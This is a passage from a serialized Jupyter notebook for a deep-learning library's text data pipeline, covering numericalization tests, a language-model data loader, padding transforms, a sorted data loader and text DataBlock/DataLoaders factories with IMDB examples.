"num = Numericalize(min_freq=2)\nnum.setup(L('This is an example of text'.split(), 'this is another text'.split()))",
"_____no_output_____"
],
[
"start = 'This is an example of text '",
"_____no_output_____"
]
],
[
[
"If no `vocab` is passed, one is created at setup from the data, using `make_vocab` with `min_freq` and `max_vocab`.",
"_____no_output_____"
]
],
[
[
"start = 'This is an example of text'\nnum = Numericalize(min_freq=1)\nnum.setup(L(start.split(), 'this is another text'.split()))\ntest_eq(set([x for x in num.vocab if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'This is an example of text this another'.split()))\ntest_eq(len(num.vocab)%8, 0)\nt = num(start.split())\n\ntest_eq(t, tensor([11, 9, 12, 13, 14, 10]))\ntest_eq(num.decode(t), start.split())",
"_____no_output_____"
],
[
"num = Numericalize(min_freq=2)\nnum.setup(L('This is an example of text'.split(), 'this is another text'.split()))\ntest_eq(set([x for x in num.vocab if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'is text'.split()))\ntest_eq(len(num.vocab)%8, 0)\nt = num(start.split())\ntest_eq(t, tensor([0, 9, 0, 0, 0, 10]))\ntest_eq(num.decode(t), f'{UNK} is {UNK} {UNK} {UNK} text'.split())",
"_____no_output_____"
],
[
"#hide\ndf = pd.DataFrame({'texts': ['This is an example of text', 'this is another text']})\ntl = TfmdLists(df, [attrgetter('text'), Tokenizer.from_df('texts'), Numericalize(min_freq=2)])\ntest_eq(tl, [tensor([2, 8, 9, 10, 0, 0, 0, 11]), tensor([2, 9, 10, 0, 11])])",
"_____no_output_____"
]
],
[
[
"## LM_DataLoader -",
"_____no_output_____"
]
],
[
[
"#export\ndef _maybe_first(o): return o[0] if isinstance(o, tuple) else o",
"_____no_output_____"
],
[
"#export\ndef _get_tokenizer(ds):\n tok = getattr(ds, 'tokenizer', None)\n if isinstance(tok, Tokenizer): return tok\n if isinstance(tok, (list,L)):\n for t in tok:\n if isinstance(t, Tokenizer): return t",
"_____no_output_____"
],
[
"#export\ndef _get_lengths(ds):\n tok = _get_tokenizer(ds)\n if tok is None: return\n return tok.get_lengths(ds.items)",
"_____no_output_____"
],
[
"#export\n#TODO: add backward\n@delegates()\nclass LMDataLoader(TfmdDL):\n \"A `DataLoader` suitable for language modeling\"\n def __init__(self, dataset, lens=None, cache=2, bs=64, seq_len=72, num_workers=0, **kwargs):\n self.items = ReindexCollection(dataset, cache=cache, tfm=_maybe_first)\n self.seq_len = seq_len\n if lens is None: lens = _get_lengths(dataset)\n if lens is None: lens = [len(o) for o in self.items]\n self.lens = ReindexCollection(lens, idxs=self.items.idxs)\n # The \"-1\" is to allow for final label, we throw away the end that's less than bs\n corpus = round_multiple(sum(lens)-1, bs, round_down=True)\n self.bl = corpus//bs #bl stands for batch length\n self.n_batches = self.bl//(seq_len) + int(self.bl%seq_len!=0)\n self.last_len = self.bl - (self.n_batches-1)*seq_len\n self.make_chunks()\n super().__init__(dataset=dataset, bs=bs, num_workers=num_workers, **kwargs)\n self.n = self.n_batches*bs\n\n def make_chunks(self): self.chunks = Chunks(self.items, self.lens)\n def shuffle_fn(self,idxs):\n self.items.shuffle()\n self.make_chunks()\n return idxs\n\n def create_item(self, seq):\n if seq>=self.n: raise IndexError\n sl = self.last_len if seq//self.bs==self.n_batches-1 else self.seq_len\n st = (seq%self.bs)*self.bl + (seq//self.bs)*self.seq_len\n txt = self.chunks[st : st+sl+1]\n return LMTensorText(txt[:-1]),txt[1:]\n\n @delegates(TfmdDL.new)\n def new(self, dataset=None, seq_len=None, **kwargs):\n lens = self.lens.coll if dataset is None else None\n seq_len = self.seq_len if seq_len is None else seq_len\n return super().new(dataset=dataset, lens=lens, seq_len=seq_len, **kwargs)",
"_____no_output_____"
],
[
"show_doc(LMDataLoader, title_level=2)",
"_____no_output_____"
]
],
[
[
"`dataset` should be a collection of numericalized texts for this to work. `lens` can be passed for optimizing the creation, otherwise, the `LMDataLoader` will do a full pass of the `dataset` to compute them. `cache` is used to avoid reloading items unnecessarily.\n\nThe `LMDataLoader` will concatenate all texts (maybe `shuffle`d) in one big stream, split it in `bs` contiguous sentences, then go through those `seq_len` at a time.",
"_____no_output_____"
]
],
[
[
"#hide\nbs,sl = 4,3\nints = L([0,1,2,3,4],[5,6,7,8,9,10],[11,12,13,14,15,16,17,18],[19,20],[21,22]).map(tensor)\ndl = LMDataLoader(ints, bs=bs, seq_len=sl)\nlist(dl)\ntest_eq(list(dl),\n [[tensor([[0, 1, 2], [5, 6, 7], [10, 11, 12], [15, 16, 17]]),\n tensor([[1, 2, 3], [6, 7, 8], [11, 12, 13], [16, 17, 18]])],\n [tensor([[3, 4], [8, 9], [13, 14], [18, 19]]),\n tensor([[4, 5], [9, 10], [14, 15], [19, 20]])]])",
"_____no_output_____"
],
[
"bs,sl = 4,3\nints = L([0,1,2,3,4],[5,6,7,8,9,10],[11,12,13,14,15,16,17,18],[19,20],[21,22,23],[24]).map(tensor)",
"_____no_output_____"
],
[
"dl = LMDataLoader(ints, bs=bs, seq_len=sl)\ntest_eq(list(dl),\n [[tensor([[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]]),\n tensor([[1, 2, 3], [7, 8, 9], [13, 14, 15], [19, 20, 21]])],\n [tensor([[3, 4, 5], [ 9, 10, 11], [15, 16, 17], [21, 22, 23]]),\n tensor([[4, 5, 6], [10, 11, 12], [16, 17, 18], [22, 23, 24]])]])",
"_____no_output_____"
],
[
"#hide\n#Check lens work\ndl = LMDataLoader(ints, lens=ints.map(len), bs=bs, seq_len=sl)\ntest_eq(list(dl),\n [[tensor([[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]]),\n tensor([[1, 2, 3], [7, 8, 9], [13, 14, 15], [19, 20, 21]])],\n [tensor([[3, 4, 5], [ 9, 10, 11], [15, 16, 17], [21, 22, 23]]),\n tensor([[4, 5, 6], [10, 11, 12], [16, 17, 18], [22, 23, 24]])]])",
"_____no_output_____"
],
[
"dl = LMDataLoader(ints, bs=bs, seq_len=sl, shuffle=True)\nfor x,y in dl: test_eq(x[:,1:], y[:,:-1])\n((x0,y0), (x1,y1)) = tuple(dl)\n#Second batch begins where first batch ended\ntest_eq(y0[:,-1], x1[:,0]) \ntest_eq(type(x0), LMTensorText)",
"_____no_output_____"
],
[
"#hide\n#test new works\ndl = LMDataLoader(ints, bs=bs, seq_len=sl, shuffle=True)\ndl1 = dl.new()\ntest_eq(dl1.seq_len, sl)\ndl2 = dl.new(seq_len=2)\ntest_eq(dl2.seq_len, 2)",
"_____no_output_____"
]
],
[
[
"### Showing -",
"_____no_output_____"
]
],
[
[
"#export\n@typedispatch\ndef show_batch(x: TensorText, y, samples, ctxs=None, max_n=10, trunc_at=150, **kwargs):\n if ctxs is None: ctxs = get_empty_df(min(len(samples), max_n))\n if trunc_at is not None: samples = L((s[0].truncate(trunc_at),*s[1:]) for s in samples)\n ctxs = show_batch[object](x, y, samples, max_n=max_n, ctxs=ctxs, **kwargs)\n display_df(pd.DataFrame(ctxs))\n return ctxs",
"_____no_output_____"
],
[
"#export\n@typedispatch\ndef show_batch(x: LMTensorText, y, samples, ctxs=None, max_n=10, trunc_at=150, **kwargs):\n samples = L((s[0].truncate(trunc_at), s[1].truncate(trunc_at)) for s in samples)\n return show_batch[TensorText](x, None, samples, ctxs=ctxs, max_n=max_n, trunc_at=None, **kwargs)",
"_____no_output_____"
]
],
[
[
"## Classification",
"_____no_output_____"
],
[
"For classification, we deal with the fact that texts don't all have the same length by using padding.",
"_____no_output_____"
]
],
[
[
"# export\nclass Pad_Input(ItemTransform):\n def encodes(self,samples, pad_idx=1, pad_fields=0, pad_first=False, backwards=False):\n \"Function that collect `samples` and adds padding\"\n self.pad_idx = pad_idx\n pad_fields = L(pad_fields)\n max_len_l = pad_fields.map(lambda f: max([len(s[f]) for s in samples]))\n if backwards: pad_first = not pad_first\n def _f(field_idx, x):\n if field_idx not in pad_fields: return x\n idx = pad_fields.items.index(field_idx) #TODO: remove items if L.index is fixed\n sl = slice(-len(x), sys.maxsize) if pad_first else slice(0, len(x))\n pad = x.new_zeros(max_len_l[idx]-x.shape[0])+pad_idx\n x1 = torch.cat([pad, x] if pad_first else [x, pad])\n if backwards: x1 = x1.flip(0)\n return retain_type(x1, x)\n return [tuple(map(lambda idxx: _f(*idxx), enumerate(s))) for s in samples]\n def decodes(self, o:TensorText):\n pad_idx = self.pad_idx if hasattr(self,'pad_idx') else 1\n return o[o != pad_idx]\npad_input=Pad_Input()",
"_____no_output_____"
]
],
[
[
"`pad_idx` is used for the padding, and the padding is applied to the `pad_fields` of the samples. The padding is applied at the beginning if `pad_first` is `True`, and if `backwards` is added, the tensors are flipped.",
"_____no_output_____"
]
],
[
[
"test_eq(pad_input([(tensor([1,2,3]),1), (tensor([4,5]), 2), (tensor([6]), 3)], pad_idx=0), \n [(tensor([1,2,3]),1), (tensor([4,5,0]),2), (tensor([6,0,0]), 3)])\ntest_eq(pad_input([(tensor([1,2,3]), (tensor([6]))), (tensor([4,5]), tensor([4,5])), (tensor([6]), (tensor([1,2,3])))], pad_idx=0, pad_fields=1), \n [(tensor([1,2,3]),(tensor([6,0,0]))), (tensor([4,5]),tensor([4,5,0])), ((tensor([6]),tensor([1, 2, 3])))])\ntest_eq(pad_input([(tensor([1,2,3]),1), (tensor([4,5]), 2), (tensor([6]), 3)], pad_idx=0, pad_first=True), \n [(tensor([1,2,3]),1), (tensor([0,4,5]),2), (tensor([0,0,6]), 3)])\ntest_eq(pad_input([(tensor([1,2,3]),1), (tensor([4,5]), 2), (tensor([6]), 3)], pad_idx=0, backwards=True), \n [(tensor([3,2,1]),1), (tensor([5,4,0]),2), (tensor([6,0,0]), 3)])\nx = pad_input([(TensorText([1,2,3]),1), (TensorText([4,5]), 2), (TensorText([6]), 3)], pad_idx=0)\ntest_eq(x, [(tensor([1,2,3]),1), (tensor([4,5,0]), 2), (tensor([6,0,0]), 3)])\ntest_eq(pad_input.decode(x[1][0]), tensor([4,5]))",
"_____no_output_____"
],
[
"#hide\n#Check retain type\nx = [(TensorText([1,2,3]),1), (TensorText([4,5]), 2), (TensorText([6]), 3)]\ny = pad_input(x, pad_idx=0)\nfor s in y: test_eq(type(s[0]), TensorText)",
"_____no_output_____"
]
],
[
[
"Pads `x` with `pad_idx` to length `pad_len`. If `pad_first` is false, all padding is appended to `x`, until `x` is len `pad_len`. Otherwise ff `pad_first` is true, then chunks of size `seq_len` are prepended to `x`, the remainder of the padding is appended to `x`. ",
"_____no_output_____"
]
],
[
[
"#export\ndef pad_chunk(x,pad_idx=1, pad_first=True, seq_len=72, pad_len=10):\n \"Pad `x` by adding padding by chunks of size `seq_len`\"\n l = pad_len - x.shape[0]\n pad_chunk = x.new_zeros((l//seq_len) * seq_len) + pad_idx\n pad_res = x.new_zeros(l % seq_len) + pad_idx\n x1 = torch.cat([pad_chunk, x, pad_res]) if pad_first else torch.cat([x, pad_chunk, pad_res])\n return retain_type(x1, x)",
"_____no_output_____"
],
[
"print('pad_first: ',pad_chunk(torch.tensor([1,2,3]),seq_len=3,pad_idx=0,pad_len=8))\nprint('pad_last: ',pad_chunk(torch.tensor([1,2,3]),seq_len=3,pad_idx=0,pad_len=8,pad_first=False))",
"pad_first: tensor([0, 0, 0, 1, 2, 3, 0, 0])\npad_last: tensor([1, 2, 3, 0, 0, 0, 0, 0])\n"
]
],
[
[
"`pad_input_chunk` is the version of `pad_chunk` that works over a list of lists. ",
"_____no_output_____"
]
],
[
[
"#export\n@delegates(pad_chunk)\ndef pad_input_chunk(samples, n_inp=1,**kwargs):\n \"Pad `samples` by adding padding by chunks of size `seq_len`\"\n max_len = max([len(s[n]) for s in samples for n in range(n_inp)])\n padeds = [[pad_chunk(s[n],pad_len=max_len,**kwargs) for n in range(n_inp) ] for s in samples]\n return [(*p, *s[n_inp:]) for p,s in zip(padeds,samples)]",
"_____no_output_____"
]
],
[
[
"The difference with the base `pad_input` is that most of the padding is applied first (if `pad_first=True`) or at the end (if `pad_first=False`) but only by a round multiple of `seq_len`. The rest of the padding is applied to the end (or the beginning if `pad_first=False`). This is to work with `SequenceEncoder` with recurrent models.",
"_____no_output_____"
]
],
[
[
"pad_input_chunk([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)], pad_idx=0, seq_len=3,n_inp=2)",
"_____no_output_____"
],
[
"test_eq(pad_input_chunk([(tensor([1,2,3,4,5,6]),1), (tensor([1,2,3]), 2), (tensor([1,2]), 3)], pad_idx=0, seq_len=2), \n [(tensor([1,2,3,4,5,6]),1), (tensor([0,0,1,2,3,0]),2), (tensor([0,0,0,0,1,2]), 3)])\ntest_eq(pad_input_chunk([(tensor([1,2,3,4,5,6]),), (tensor([1,2,3]),), (tensor([1,2]),)], pad_idx=0, seq_len=2), \n [(tensor([1,2,3,4,5,6]),), (tensor([0,0,1,2,3,0]),), (tensor([0,0,0,0,1,2]),)])\ntest_eq(pad_input_chunk([(tensor([1,2,3,4,5,6]),), (tensor([1,2,3]),), (tensor([1,2]),)], pad_idx=0, seq_len=2, pad_first=False), \n [(tensor([1,2,3,4,5,6]),), (tensor([1,2,3,0,0,0]),), (tensor([1,2,0,0,0,0]),)])\n\ntest_eq(pad_input_chunk([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)], pad_idx=0, seq_len=2,n_inp=2), \n [(TensorText([1,2,3,4,5,6]),TensorText([0,0,0,0,1,2]),1)])",
"_____no_output_____"
]
],
[
[
"`Transform` version of `pad_input_chunk`. This version supports types, decoding, and the other functionality of `Transform`",
"_____no_output_____"
]
],
[
[
"#export\nclass Pad_Chunk(DisplayedTransform):\n \"Pad `samples` by adding padding by chunks of size `seq_len`\"\n def __init__(self, pad_idx=1, pad_first=True, seq_len=72,decode=True,**kwargs):\n store_attr('pad_idx, pad_first, seq_len,seq_len')\n super().__init__(**kwargs)\n def before_call(self, b):\n \"Set `self.max_len` before encodes\" \n self.max_len = max([x.shape[0] for xs in b for x in xs if isinstance(x,TensorText)])\n def __call__(self, b, **kwargs):\n self.before_call(b)\n return super().__call__(tuple(b), **kwargs)\n def encodes(self, x:TensorText):\n return pad_chunk(x,pad_idx=self.pad_idx, pad_first=self.pad_first, seq_len=self.seq_len, pad_len=self.max_len)\n def decodes(self, o:TensorText):\n return o[o != self.pad_idx] if self.decode else o",
"_____no_output_____"
]
],
[
[
"Here is an example of `Pad_Chunk`",
"_____no_output_____"
]
],
[
[
"pc=Pad_Chunk(pad_idx=0,seq_len=3)\nout=pc([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)])\nprint('Inputs: ',*[(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)])\nprint('Encoded: ',*out)\nprint('Decoded: ',*pc.decode(out))",
"Inputs: (TensorText([1, 2, 3, 4, 5, 6]), TensorText([1, 2]), 1)\nEncoded: (TensorText([1, 2, 3, 4, 5, 6]), TensorText([0, 0, 0, 1, 2, 0]), 1)\nDecoded: (TensorText([1, 2, 3, 4, 5, 6]), TensorText([1, 2]), 1)\n"
],
[
"pc=Pad_Chunk(pad_idx=0, seq_len=2)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),1), (TensorText([1,2,3]), 2), (TensorText([1,2]), 3)]), \n [(tensor([1,2,3,4,5,6]),1), (tensor([0,0,1,2,3,0]),2), (tensor([0,0,0,0,1,2]), 3)])\n\npc=Pad_Chunk(pad_idx=0, seq_len=2)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),), (TensorText([1,2,3]),), (TensorText([1,2]),)]), \n [(tensor([1,2,3,4,5,6]),), (tensor([0,0,1,2,3,0]),), (tensor([0,0,0,0,1,2]),)])\n\npc=Pad_Chunk(pad_idx=0, seq_len=2, pad_first=False)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),), (TensorText([1,2,3]),), (TensorText([1,2]),)]), \n [(tensor([1,2,3,4,5,6]),), (tensor([1,2,3,0,0,0]),), (tensor([1,2,0,0,0,0]),)])\n\npc=Pad_Chunk(pad_idx=0, seq_len=2)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)]), \n [(TensorText([1,2,3,4,5,6]),TensorText([0,0,0,0,1,2]),1)])",
"_____no_output_____"
],
[
"#export\ndef _default_sort(x): return len(x[0])\n\n@delegates(TfmdDL)\nclass SortedDL(TfmdDL):\n \"A `DataLoader` that goes throught the item in the order given by `sort_func`\"\n def __init__(self, dataset, sort_func=None, res=None, **kwargs):\n super().__init__(dataset, **kwargs)\n self.sort_func = _default_sort if sort_func is None else sort_func\n if res is None and self.sort_func == _default_sort: res = _get_lengths(dataset)\n self.res = [self.sort_func(self.do_item(i)) for i in range_of(self.dataset)] if res is None else res\n if len(self.res) > 0: self.idx_max = np.argmax(self.res)\n\n def get_idxs(self):\n idxs = super().get_idxs()\n if self.shuffle: return idxs\n return sorted(idxs, key=lambda i: self.res[i], reverse=True)\n\n def shuffle_fn(self,idxs):\n idxs = np.random.permutation(len(self.dataset))\n idx_max = np.where(idxs==self.idx_max)[0][0]\n idxs[0],idxs[idx_max] = idxs[idx_max],idxs[0]\n sz = self.bs*50\n chunks = [idxs[i:i+sz] for i in range(0, len(idxs), sz)]\n chunks = [sorted(s, key=lambda i: self.res[i], reverse=True) for s in chunks]\n sort_idx = np.concatenate(chunks)\n\n sz = self.bs\n batches = [sort_idx[i:i+sz] for i in range(0, len(sort_idx), sz)]\n sort_idx = np.concatenate(np.random.permutation(batches[1:-1])) if len(batches) > 2 else np.array([],dtype=np.int)\n sort_idx = np.concatenate((batches[0], sort_idx) if len(batches)==1 else (batches[0], sort_idx, batches[-1]))\n return iter(sort_idx)\n\n @delegates(TfmdDL.new)\n def new(self, dataset=None, **kwargs):\n if 'val_res' in kwargs and kwargs['val_res'] is not None: res = kwargs['val_res']\n else: res = self.res if dataset is None else None\n return super().new(dataset=dataset, res=res, **kwargs)",
"_____no_output_____"
]
],
[
[
"`res` is the result of `sort_func` applied on all elements of the `dataset`. You can pass it if available to make the init much faster by avoiding an initial pass over the whole dataset. For example if sorting by text length (as in the default `sort_func`, called `_default_sort`) you should pass a list with the length of each element in `dataset` to `res` to take advantage of this speed-up. \n\nTo get the same init speed-up for the validation set, `val_res` (a list of text lengths for your validation set) can be passed to the `kwargs` argument of `SortedDL`. Below is an example to reduce the init time by passing a list of text lengths for both the training set and the validation set:\n\n```\n# Pass the training dataset text lengths to SortedDL\nsrtd_dl=partial(SortedDL, res = train_text_lens)\n\n# Pass the validation dataset text lengths \ndl_kwargs = [{},{'val_res': val_text_lens}]\n\n# init our Datasets \ndsets = Datasets(...) \n\n# init our Dataloaders\ndls = dsets.dataloaders(...,dl_type = srtd_dl, dl_kwargs = dl_kwargs)\n```\n\nIf `shuffle` is `True`, this will shuffle a bit the results of the sort to have items of roughly the same size in batches, but not in the exact sorted order.",
"_____no_output_____"
]
],
[
[
"ds = [(tensor([1,2]),1), (tensor([3,4,5,6]),2), (tensor([7]),3), (tensor([8,9,10]),4)]\ndl = SortedDL(ds, bs=2, before_batch=partial(pad_input, pad_idx=0))\ntest_eq(list(dl), [(tensor([[ 3, 4, 5, 6], [ 8, 9, 10, 0]]), tensor([2, 4])), \n (tensor([[1, 2], [7, 0]]), tensor([1, 3]))])",
"_____no_output_____"
],
[
"ds = [(tensor(range(random.randint(1,10))),i) for i in range(101)]\ndl = SortedDL(ds, bs=2, create_batch=partial(pad_input, pad_idx=-1), shuffle=True, num_workers=0)\nbatches = list(dl)\nmax_len = len(batches[0][0])\nfor b in batches: \n assert(len(b[0])) <= max_len \n test_ne(b[0][-1], -1)",
"_____no_output_____"
]
],
[
[
"## TransformBlock for text",
"_____no_output_____"
],
[
"To use the data block API, you will need this build block for texts.",
"_____no_output_____"
]
],
[
[
"#export\nclass TextBlock(TransformBlock):\n \"A `TransformBlock` for texts\"\n @delegates(Numericalize.__init__)\n def __init__(self, tok_tfm, vocab=None, is_lm=False, seq_len=72, backwards=False, **kwargs):\n type_tfms = [tok_tfm, Numericalize(vocab, **kwargs)]\n if backwards: type_tfms += [reverse_text]\n return super().__init__(type_tfms=type_tfms,\n dl_type=LMDataLoader if is_lm else SortedDL,\n dls_kwargs={'seq_len': seq_len} if is_lm else {'before_batch': Pad_Chunk(seq_len=seq_len)})\n\n @classmethod\n @delegates(Tokenizer.from_df, keep=True)\n def from_df(cls, text_cols, vocab=None, is_lm=False, seq_len=72, backwards=False, min_freq=3, max_vocab=60000, **kwargs):\n \"Build a `TextBlock` from a dataframe using `text_cols`\"\n return cls(Tokenizer.from_df(text_cols, **kwargs), vocab=vocab, is_lm=is_lm, seq_len=seq_len,\n backwards=backwards, min_freq=min_freq, max_vocab=max_vocab)\n\n @classmethod\n @delegates(Tokenizer.from_folder, keep=True)\n def from_folder(cls, path, vocab=None, is_lm=False, seq_len=72, backwards=False, min_freq=3, max_vocab=60000, **kwargs):\n \"Build a `TextBlock` from a `path`\"\n return cls(Tokenizer.from_folder(path, **kwargs), vocab=vocab, is_lm=is_lm, seq_len=seq_len,\n backwards=backwards, min_freq=min_freq, max_vocab=max_vocab)",
"_____no_output_____"
]
],
[
[
"For efficient tokenization, you probably want to use one of the factory methods. Otherwise, you can pass your custom `tok_tfm` that will deal with tokenization (if your texts are already tokenized, you can pass `noop`), a `vocab`, or leave it to be inferred on the texts using `min_freq` and `max_vocab`.\n\n`is_lm` indicates if we want to use texts for language modeling or another task, `seq_len` is only necessary to tune if `is_lm=False`, and is passed along to `pad_input_chunk`.",
"_____no_output_____"
]
],
[
[
"show_doc(TextBlock.from_df)",
"_____no_output_____"
]
],
[
[
"Here is an example using a sample of IMDB stored as a CSV file:",
"_____no_output_____"
]
],
[
[
"path = untar_data(URLs.IMDB_SAMPLE)\ndf = pd.read_csv(path/'texts.csv')\n\nimdb_clas = DataBlock(\n blocks=(TextBlock.from_df('text', seq_len=72), CategoryBlock),\n get_x=ColReader('text'), get_y=ColReader('label'), splitter=ColSplitter())\n\ndls = imdb_clas.dataloaders(df, bs=64)\ndls.show_batch(max_n=2)",
"_____no_output_____"
]
],
[
[
"`vocab`, `is_lm`, `seq_len`, `min_freq` and `max_vocab` are passed to the main init, the other argument to `Tokenizer.from_df`.",
"_____no_output_____"
]
],
[
[
"show_doc(TextBlock.from_folder)",
"_____no_output_____"
]
],
[
[
"`vocab`, `is_lm`, `seq_len`, `min_freq` and `max_vocab` are passed to the main init, the other argument to `Tokenizer.from_folder`.",
"_____no_output_____"
],
[
"## TextDataLoaders -",
"_____no_output_____"
]
],
[
[
"#export\nclass TextDataLoaders(DataLoaders):\n \"Basic wrapper around several `DataLoader`s with factory methods for NLP problems\"\n @classmethod\n @delegates(DataLoaders.from_dblock)\n def from_folder(cls, path, train='train', valid='valid', valid_pct=None, seed=None, vocab=None, text_vocab=None, is_lm=False,\n tok_tfm=None, seq_len=72, backwards=False, **kwargs):\n \"Create from imagenet style dataset in `path` with `train` and `valid` subfolders (or provide `valid_pct`)\"\n splitter = GrandparentSplitter(train_name=train, valid_name=valid) if valid_pct is None else RandomSplitter(valid_pct, seed=seed)\n blocks = [TextBlock.from_folder(path, text_vocab, is_lm, seq_len, backwards) if tok_tfm is None else TextBlock(tok_tfm, text_vocab, is_lm, seq_len, backwards)]\n if not is_lm: blocks.append(CategoryBlock(vocab=vocab))\n get_items = partial(get_text_files, folders=[train,valid]) if valid_pct is None else get_text_files\n dblock = DataBlock(blocks=blocks,\n get_items=get_items,\n splitter=splitter,\n get_y=None if is_lm else parent_label)\n return cls.from_dblock(dblock, path, path=path, seq_len=seq_len, **kwargs)\n\n @classmethod\n @delegates(DataLoaders.from_dblock)\n def from_df(cls, df, path='.', valid_pct=0.2, seed=None, text_col=0, label_col=1, label_delim=None, y_block=None,\n text_vocab=None, is_lm=False, valid_col=None, tok_tfm=None, tok_text_col=\"text\", seq_len=72, backwards=False, **kwargs):\n \"Create from `df` in `path` with `valid_pct`\"\n blocks = [TextBlock.from_df(text_col, text_vocab, is_lm, seq_len, backwards) if tok_tfm is None else TextBlock(tok_tfm, text_vocab, is_lm, seq_len, backwards)]\n if y_block is None and not is_lm:\n blocks.append(MultiCategoryBlock if is_listy(label_col) and len(label_col) > 1 else CategoryBlock)\n if y_block is not None and not is_lm: blocks += (y_block if is_listy(y_block) else [y_block])\n splitter = RandomSplitter(valid_pct, seed=seed) if valid_col is None else ColSplitter(valid_col)\n dblock = DataBlock(blocks=blocks,\n get_x=ColReader(tok_text_col),\n get_y=None if is_lm else ColReader(label_col, label_delim=label_delim),\n splitter=splitter)\n return cls.from_dblock(dblock, df, path=path, seq_len=seq_len, **kwargs)\n\n @classmethod\n def from_csv(cls, path, csv_fname='labels.csv', header='infer', delimiter=None, **kwargs):\n \"Create from `csv` file in `path/csv_fname`\"\n df = pd.read_csv(Path(path)/csv_fname, header=header, delimiter=delimiter)\n return cls.from_df(df, path=path, **kwargs)\n\nTextDataLoaders.from_csv = delegates(to=TextDataLoaders.from_df)(TextDataLoaders.from_csv)",
"_____no_output_____"
],
[
"show_doc(TextDataLoaders, title_level=2)",
"_____no_output_____"
]
],
[
[
"You should not use the init directly but one of the following factory methods. All those factory methods accept as arguments:\n\n- `text_vocab`: the vocabulary used for numericalizing texts (if not passed, it's inferred from the data)\n- `tok_tfm`: if passed, uses this `tok_tfm` instead of the default\n- `seq_len`: the sequence length used for batch\n- `bs`: the batch size\n- `val_bs`: the batch size for the validation `DataLoader` (defaults to `bs`)\n- `shuffle_train`: if we shuffle the training `DataLoader` or not\n- `device`: the PyTorch device to use (defaults to `default_device()`)",
"_____no_output_____"
]
],
[
[
"show_doc(TextDataLoaders.from_folder)",
"_____no_output_____"
]
],
[
[
"If `valid_pct` is provided, a random split is performed (with an optional `seed`) by setting aside that percentage of the data for the validation set (instead of looking at the grandparents folder). If a `vocab` is passed, only the folders with names in `vocab` are kept.\n\nHere is an example on a sample of the IMDB movie review dataset:",
"_____no_output_____"
]
],
[
[
"#slow\npath = untar_data(URLs.IMDB)\ndls = TextDataLoaders.from_folder(path)\ndls.show_batch(max_n=3)",
"_____no_output_____"
],
[
"show_doc(TextDataLoaders.from_df)",
"_____no_output_____"
]
],
[
[
"`seed` can optionally be passed for reproducibility. `text_col`, `label_col` and optionally `valid_col` are indices or names of columns for texts/labels and the validation flag. `label_delim` can be passed for a multi-label problem if your labels are in one column, separated by a particular char. `y_block` should be passed to indicate your type of targets, in case the library did no infer it properly.\n\nAlong with this, you can specify the specific column the tokenized text are sent to with `tok_text_col`. By default they are stored in a column named `text` after tokenizing. \n\nHere are examples on subsets of IMDB:",
"_____no_output_____"
]
],
[
[
"path = untar_data(URLs.IMDB_SAMPLE)",
"_____no_output_____"
],
[
"df = pd.read_csv(path/\"texts.csv\"); df.head()",
"_____no_output_____"
],
[
"#hide\npath = untar_data(URLs.IMDB_SAMPLE)\ndf = pd.read_csv(path/\"texts.csv\")\ndf.columns = ['label', 'text_col', 'is_valid'] # to test tok_text_col is working properly\ndls = TextDataLoaders.from_df(df, path=path, text_col='text_col', label_col='label', valid_col='is_valid')\ndl = dls.test_dl([\"This movie was bad\"])\nx, = dl.one_batch()\ntest_eq(x.cpu(), TensorText([[2,8,21,29,25,97]]))",
"_____no_output_____"
],
[
"path = untar_data(URLs.IMDB_SAMPLE)\ndls = TextDataLoaders.from_df(df, path=path, text_col='text', label_col='label', valid_col='is_valid')\ndls.show_batch(max_n=3)",
"_____no_output_____"
],
[
"dls = TextDataLoaders.from_df(df, path=path, text_col='text', is_lm=True, valid_col='is_valid')\ndls.show_batch(max_n=3)",
"_____no_output_____"
],
[
"show_doc(TextDataLoaders.from_csv)",
"_____no_output_____"
]
],
[
[
"Opens the csv file with `header` and `delimiter`, then pass all the other arguments to `TextDataLoaders.from_df`.",
"_____no_output_____"
]
],
[
[
"dls = TextDataLoaders.from_csv(path=path, csv_fname='texts.csv', text_col='text', label_col='label', valid_col='is_valid')\ndls.show_batch(max_n=3)",
"_____no_output_____"
]
],
[
[
"## Export -",
"_____no_output_____"
]
],
[
[
"#hide\nfrom nbdev.export import notebook2script\nnotebook2script()",
"Converted 00_torch_core.ipynb.\nConverted 01_layers.ipynb.\nConverted 01a_losses.ipynb.\nConverted 02_data.load.ipynb.\nConverted 03_data.core.ipynb.\nConverted 04_data.external.ipynb.\nConverted 05_data.transforms.ipynb.\nConverted 06_data.block.ipynb.\nConverted 07_vision.core.ipynb.\nConverted 08_vision.data.ipynb.\nConverted 09_vision.augment.ipynb.\nConverted 09b_vision.utils.ipynb.\nConverted 09c_vision.widgets.ipynb.\nConverted 10_tutorial.pets.ipynb.\nConverted 10b_tutorial.albumentations.ipynb.\nConverted 11_vision.models.xresnet.ipynb.\nConverted 12_optimizer.ipynb.\nConverted 13_callback.core.ipynb.\nConverted 13a_learner.ipynb.\nConverted 13b_metrics.ipynb.\nConverted 14_callback.schedule.ipynb.\nConverted 14a_callback.data.ipynb.\nConverted 15_callback.hook.ipynb.\nConverted 15a_vision.models.unet.ipynb.\nConverted 16_callback.progress.ipynb.\nConverted 17_callback.tracker.ipynb.\nConverted 18_callback.fp16.ipynb.\nConverted 18a_callback.training.ipynb.\nConverted 18b_callback.preds.ipynb.\nConverted 19_callback.mixup.ipynb.\nConverted 20_interpret.ipynb.\nConverted 20a_distributed.ipynb.\nConverted 21_vision.learner.ipynb.\nConverted 22_tutorial.imagenette.ipynb.\nConverted 23_tutorial.vision.ipynb.\nConverted 24_tutorial.siamese.ipynb.\nConverted 24_vision.gan.ipynb.\nConverted 30_text.core.ipynb.\nConverted 31_text.data.ipynb.\nConverted 32_text.models.awdlstm.ipynb.\nConverted 33_text.models.core.ipynb.\nConverted 34_callback.rnn.ipynb.\nConverted 35_tutorial.wikitext.ipynb.\nConverted 